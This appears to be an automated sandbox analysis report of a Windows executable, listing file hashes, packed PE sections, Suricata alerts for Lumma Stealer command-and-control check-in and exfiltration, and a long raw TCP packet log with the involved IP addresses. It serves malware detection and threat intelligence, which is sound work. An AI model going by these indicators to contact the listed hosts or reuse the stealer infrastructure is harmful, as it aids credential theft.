                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                  MD5:3A8957C6382192B71471BD14359D0B12
                                                                                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                  C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2798080
                                                                                  Entropy (8bit):6.452597665535373
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:gQdaU1ZCzVFveCLQ02XvLYat34rApazA4uexd:gQdaU1ZCzVxeCLQ0ITR34kpalb
                                                                                  MD5:241D9C9E1DF8F28851CBC0421AA56E70
                                                                                  SHA1:2CC8DE7966860091B562EED8DFF718E77DB7CD59
                                                                                  SHA-256:167CDD2B4B63621CC3D147C7C84B79F414BF9402376C604080701A63FAC8078D
                                                                                  SHA-512:CE66ABEFA7EDDBEAA922AB2E8CE9ABF4D37362468A7B05C471FDA1C947B383D3BFE2BD9F319DD60F5475AE26023C1020294CADC30D9E1D7F17D186F46D8EB6A0
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+.....MX+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...vgffvxyy.`*......R*..:..............@...exxzjjll. ....+.......*.............@....taggant.@... +.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.5454932665606345
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:2'985'472 bytes
                                                                                  MD5:4f0ec9b4a92f1fd134607802eae25e8d
                                                                                  SHA1:769dd5f80e8ffd3ac61a644a23406d25ab8c1d8b
                                                                                  SHA256:19bd761990c86d5b2ec8776e31874449845bc0a38cc137f65739fea6d0adadc9
                                                                                  SHA512:aa5730becac0532271a55eeddb16f4c09d6fb95fe71e791251cbc569b78d1cc1bda4bf1a8614ce04d2ed4ecb10889ec08d5e3849c83391e444484c701594eb7a
                                                                                  SSDEEP:49152:6MluHxlR/Okv11eFrVI+Xq8a7IYpgIeofCkMIEsS3:6rHxlR/OkDeFrVI+60Yp7DqkHE/3
                                                                                  TLSH:4DD56CB2F506B1DBD48E2738967BCE82DD5C47B90B284DC3D868A479BD63DC015B6C28
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.....!.-...@.................................T...h..

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x70a000
                                                                                  Entrypoint Section:.taggant
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp 00007FAF74CE0FFAh

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  0x10000x580000x27e0055e070ea8c43fe485ce2fc6389a7dfb9False0.9979672805642633data7.974060215708327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  nbbggopa0x5b0000x2ae0000x2ad6002a7f6234567b7081c5edd935231f5327unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  qiwuxnts0x3090000x10000x6001352dcba6e97c4848fe7ef9dff5d0b7fFalse0.5657552083333334data4.97807168827804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .taggant0x30a0000x30000x2200eb796bf67af3fbf2f8172bf7f246d6edFalse0.064453125DOS executable (COM)0.7462189429585063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                  Imports

                                                                                  DLLImport
                                                                                  kernel32.dlllstrcpy

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-27T08:52:12.279651+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.21.95.91443TCP
                                                                                  2024-10-27T08:52:12.279651+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.21.95.91443TCP
                                                                                  2024-10-27T08:52:13.820846+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749702104.21.95.91443TCP
                                                                                  2024-10-27T08:52:13.820846+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702104.21.95.91443TCP
                                                                                  2024-10-27T08:52:15.253097+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749703104.21.95.91443TCP
                                                                                  2024-10-27T08:52:25.586225+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749763104.21.95.91443TCP
                                                                                  2024-10-27T08:52:26.520349+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749769185.215.113.1680TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 27, 2024 08:52:10.501283884 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:10.501377106 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:10.501454115 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:10.504585981 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:10.504623890 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:11.132484913 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:11.132572889 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:11.164266109 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:11.164309978 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:11.165285110 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:11.220529079 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:11.761938095 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:11.762006044 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:11.762285948 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.279716969 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.279841900 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.279906988 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.289733887 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.289778948 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.289813042 CET49700443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.289829969 CET44349700104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.685204029 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.685295105 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:12.685374975 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.685657978 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:12.685693026 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.312638044 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.312728882 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.313915968 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.313939095 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.314496994 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.315893888 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.315937042 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.316008091 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.820869923 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821034908 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821080923 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821101904 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.821115971 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821496964 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821547985 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.821557999 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.821597099 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.821805954 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.827227116 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.827397108 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.827465057 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.827474117 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.830168009 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.830173969 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.876796007 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.938227892 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.938549995 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.938621998 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.938632965 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.938678980 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.938747883 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.938770056 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.938994884 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.939059973 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.939130068 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.939155102 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:13.939179897 CET49702443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:13.939193010 CET44349702104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.057512999 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.057548046 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.057635069 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.057921886 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.057939053 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.677776098 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.677870989 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.679033041 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.679054022 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.679416895 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:14.682333946 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.682521105 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:14.682565928 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:15.253173113 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:15.253411055 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:15.253628969 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:15.446326971 CET49703443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:15.446382999 CET44349703104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.181864023 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.181898117 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.181958914 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.182264090 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.182276011 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.807110071 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.807218075 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.808382988 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.808392048 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.808715105 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.810293913 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.810440063 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.810468912 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:16.810527086 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:16.810530901 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:17.236597061 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:17.236711025 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:17.236766100 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:17.236855984 CET49709443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:17.236872911 CET44349709104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:17.441711903 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:17.441775084 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:17.441930056 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:17.442214012 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:17.442243099 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:18.063822985 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:18.063930988 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:18.065078974 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:18.065107107 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:18.065606117 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:18.067178011 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:18.067388058 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:18.067430973 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:18.067512035 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:18.067528009 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:19.093039036 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:19.093178034 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:19.093231916 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:19.093348980 CET49720443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:19.093359947 CET44349720104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:19.441657066 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:19.441708088 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:19.441781998 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:19.442054987 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:19.442065001 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.058070898 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.058161974 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.060615063 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.060626030 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.061546087 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.062973976 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.063129902 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.063134909 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.580975056 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.581104040 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:20.581186056 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.581362009 CET49731443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:20.581388950 CET44349731104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.042402029 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.042474985 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.042557955 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.043034077 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.043061972 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.665457010 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.665604115 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.666817904 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.666837931 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.667159081 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.669054985 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670310974 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670351982 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.670452118 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670494080 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.670604944 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670644045 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.670761108 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670799017 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.670933962 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.670974970 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.671114922 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.671158075 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.682056904 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.682238102 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.682287931 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.682310104 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.682338953 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.682446957 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.682488918 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.682516098 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.687175035 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.687340021 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.687378883 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:21.687406063 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.687443018 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:21.687993050 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:24.459131956 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:24.459247112 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:24.459361076 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:24.459501982 CET49742443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:24.459543943 CET44349742104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:24.470284939 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:24.470325947 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:24.470419884 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:24.470789909 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:24.470808983 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.071095943 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.071173906 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.072526932 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.072539091 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.073479891 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.074798107 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.074819088 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.074925900 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.586241961 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.586358070 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.586411953 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.586862087 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.586885929 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.586904049 CET49763443192.168.2.7104.21.95.91
                                                                                  Oct 27, 2024 08:52:25.586910009 CET44349763104.21.95.91192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.589903116 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:25.595392942 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:25.595464945 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:25.595875025 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:25.601257086 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520282984 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520299911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520325899 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520332098 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520335913 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520339012 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520347118 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520349026 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.520401955 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.520466089 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520484924 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520498991 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.520505905 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.520528078 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.525712013 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.525752068 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.525794029 CET4976980192.168.2.7185.215.113.16
